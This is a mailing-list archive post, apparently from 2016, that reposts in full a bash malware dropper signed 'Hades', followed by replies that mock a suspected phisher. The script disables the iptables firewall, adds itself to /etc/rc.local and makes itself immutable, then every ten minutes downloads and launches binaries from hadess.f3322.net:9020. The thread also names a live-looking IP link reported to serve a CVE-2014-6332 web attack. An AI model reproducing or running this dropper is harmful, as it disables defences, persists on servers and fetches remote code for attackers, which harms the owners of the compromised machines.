[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[no subject]



You got it -

#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
#                by:Hades
#                2016-03-10
service iptables stop > /dev/null 2>&1 &
host_dir=`pwd`
if [ "sh $host_dir/journal &" = "$(cat /etc/rc.local | grep
$host_dir/journal | grep -v grep)" ]; then
    echo ""
else
    echo "sh $host_dir/journal &" >> /etc/rc.local
fi
chattr +i $host_dir/journal
while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "$host_dir/hades" | grep -v grep | wc
-l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "$host_dir/hades" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                ./wget http://hadess.f3322.net:9020/hades -c -O ./hades &>
/dev/null
                chmod 755 ./hades
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        ./hades &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "$host_dir/hades" | grep -v grep | awk
'{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "$host_dir/journal" | grep -v grep | wc
-l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "$host_dir/journal" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                ./wget http://hadess.f3322.net:9020/journal -c -O
$host_dir/journal &> /dev/null
                chmod 755 $host_dir/journal
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
    $host_dir/journal &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "$host_dir/journal" | grep -v grep |
awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi
    sleep 600
done


-----Original Message-----
From: John Young [mailto:[email protected]] 
Sent: Tuesday, May 10, 2016 7:58 AM
To: [email protected]; Greg Moss <[email protected]>
Subject: Re:

Great, "Greg." Log on to the IP address, click on journal. Prepare to buy
new hard disk, hopelessly try to clean out back-ups, avoid for life the
suckers you infected.

Then try to get out of jail from the phishing gangsters who entrapped you by
getting into your TEMPEST-hardened computer setup and threatening to send to
your relatives and customers their implanted vile kiddie porn collection as
if yours and report to the FBI "Greg's" vast cache of stolen celebrity
accounts and hundreds of nyms, Tor logs, USG break-ins, counterfeit
Bitcoins, comsec dirty work, rattings to LE, and, listen, hear what's
buzzing over your bunker. battering your steel gate.

At 10:20 AM 5/10/2016, you wrote:

>Most interested in the Journal file. Could someone have a look?
>On May 10, 2016 3:53 AM, "John Young" 
><<mailto:[email protected]>[email protected]> wrote:
>At 02:13 AM 5/10/2016, Greg Moss imposter phished:
><http://219.234.6.206:8080/>http://219.234.6.206:8080/
>
>
>Which produces:
>
>Web attack: Microsoft OleAut32 RCE CVE-2014-6332
>
>